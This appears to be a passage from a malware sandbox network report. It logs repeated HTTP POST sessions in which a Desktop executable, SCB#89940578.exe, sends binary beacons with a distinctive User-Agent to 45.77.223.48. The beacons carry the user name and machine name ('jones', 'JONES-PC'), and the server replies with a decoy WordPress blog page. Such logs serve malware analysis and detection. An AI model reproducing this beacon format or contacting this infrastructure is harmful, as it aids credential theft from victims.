                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:41.660722971 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:41.849893093 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:42.965972900 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:41 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:42.966023922 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:42.966092110 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:42.983936071 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:42.984520912 CEST166INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74
                                            Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:42.984630108 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:42.984886885 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:42.984939098 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:42.984998941 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:42:42.985074997 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.44976845.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:43.312556028 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:43.502001047 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:44.455298901 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:43 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:44.455429077 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:44.455666065 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:44.472052097 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:44.475182056 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:44.475312948 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:44.475519896 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:44.475617886 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:44.475699902 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:44.475775957 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.44976945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:44.797094107 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:44.985744953 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:45.872083902 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:44 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:45.872117996 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:45.872133970 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:45.889679909 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:45.890809059 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:45.894707918 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:45.894797087 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:45.894941092 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:45.894994020 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:45.895092010 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.44977045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:46.212974072 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:46.400558949 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:47.326965094 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:46 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:47.327075958 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:47.327202082 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:47.340939045 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:47.344851971 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:47.344959021 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:47.345092058 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:47.345266104 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:47.345349073 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:47.345377922 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.44977145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:47.670237064 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:47.859134912 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:48.762094975 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:47 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:48.762229919 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:48.771694899 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:48.772346020 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:48.772384882 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:48.772443056 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
